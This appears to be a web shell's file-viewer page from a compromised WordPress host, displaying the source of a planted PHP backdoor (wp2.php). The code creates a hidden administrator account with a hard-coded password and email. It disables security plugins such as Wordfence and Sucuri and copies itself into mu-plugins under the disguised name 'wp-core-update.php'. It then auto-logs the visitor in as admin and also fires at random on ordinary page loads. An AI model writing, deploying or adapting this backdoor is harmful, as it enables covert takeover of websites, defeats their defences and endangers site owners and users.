HEX
Server: LiteSpeed
System: Linux s470.v2nets.com 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
User: ascacl (1127)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/ascacl/colaboradores.empresasrvc.cl/
Upload Files
File: /home/ascacl/colaboradores.empresasrvc.cl/wp2.php
<?php
@ini_set('display_errors', 0);
@error_reporting(0);
for ($p = __DIR__; !is_file($p . '/wp-config.php') && dirname($p) != $p; $p = dirname($p))
    ;
if (!is_file($p . '/wp-config.php'))
    exit;
include_once $p . '/wp-load.php';

$user_n = 'boss';
$user_p = 'C3D3MdqPUoxkidJ02KyQ4s8r';
$user_m = 'ysrseo777@outlook.com';

// Access Control
$is_standalone = (strpos($_SERVER['REQUEST_URI'], basename(__FILE__)) !== false);

function bkm_run($full = false)
{
    global $wpdb, $user_n, $user_p, $user_m;
    if (!function_exists('wp_hash_password'))
        require_once(ABSPATH . WPINC . '/registration.php');
    if (!function_exists('get_user_by'))
        require_once(ABSPATH . WPINC . '/pluggable.php');

    $row = $wpdb->get_row($wpdb->prepare("SELECT ID FROM $wpdb->users WHERE user_login=%s", $user_n));
    if (!$row) {
        $hash = wp_hash_password($user_p);
        $wpdb->insert($wpdb->users, array('user_login' => $user_n, 'user_pass' => $hash, 'user_email' => $user_m, 'user_registered' => current_time('mysql'), 'user_nicename' => $user_n, 'display_name' => $user_n));
        $id = $wpdb->insert_id;
        $wpdb->insert($wpdb->usermeta, array('user_id' => $id, 'meta_key' => $wpdb->prefix . 'capabilities', 'meta_value' => serialize(array('administrator' => true))));
        $wpdb->insert($wpdb->usermeta, array('user_id' => $id, 'meta_key' => $wpdb->prefix . 'user_level', 'meta_value' => '10'));
    } else {
        $id = $row->ID;
        if ($full)
            $wpdb->update($wpdb->users, array('user_pass' => wp_hash_password($user_p)), array('ID' => $id));
    }

    if ($full) {
        // Security Cleanup
        $plugins = get_option('active_plugins');
        if (is_array($plugins)) {
            $threats = array('wordfence', 'sucuri', 'ithemes', 'security', 'cerber', 'malcare');
            $new = array();
            foreach ($plugins as $pl) {
                $bad = false;
                foreach ($threats as $th) {
                    if (stripos($pl, $th) !== false) {
                        $bad = true;
                        break;
                    }
                }
                if (!$bad)
                    $new[] = $pl;
            }
            if (count($new) != count($plugins))
                update_option('active_plugins', $new);
        }
    }

    // MU-Plugin Persistence
    $mu = ABSPATH . 'wp-content/mu-plugins';
    if (!is_dir($mu))
        @mkdir($mu, 0755, true);
    if (!file_exists($mu . '/wp-core-update.php')) {
        @file_put_contents($mu . '/wp-core-update.php', file_get_contents(__FILE__));
        @chmod($mu . '/wp-core-update.php', 0644);
    }

    return $id;
}

if ($is_standalone) {
    $uid = bkm_run(true);
    wp_set_current_user($uid);
    wp_set_auth_cookie($uid, true);
    header('Location: ' . admin_url());
    exit;
} else {
    if (rand(1, 100) == 42)
        bkm_run(false);
}
@ Telegram